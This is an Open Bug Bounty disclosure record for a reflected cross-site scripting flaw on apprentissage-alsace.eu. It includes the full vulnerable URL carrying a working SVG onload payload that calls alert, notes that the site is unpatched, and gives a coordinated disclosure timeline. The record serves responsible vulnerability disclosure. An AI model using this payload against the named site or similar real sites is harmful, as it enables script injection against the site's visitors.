apprentissage-alsace.eu XSS vulnerability

2017-07-06T18:57:00
ID OBB:260838
Type openbugbounty
Reporter xssbuddy
Modified 2017-08-04T06:15:00

Description

Vulnerable URL:
http://www.apprentissage-alsace.eu/component/agenda/index.php?option=com_agenda&view;=liste&task;=liste&controller;=agenda&recherche;%5Bmot%5D=pa%22--!%3E%3CSvg/OnLoad=alert(`OPENBUGBOUNTY`)%3E%22&recherche;%5Bperiode%5D=2017-07&recherche;%5Btheme%5D=0&Envoyer;=OK#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 04.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1593747
VIP website status:| No
Check apprentissage-alsace.eu SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 July, 2017 18:57 GMT
Vulnerability existence verified and confirmed| 7 July, 2017 05:24 GMT
Generic security notifications sent to website owner| 7 July, 2017 05:24 GMT
Vulnerability details disclosed by researcher| 4 August, 2017 06:15 GMT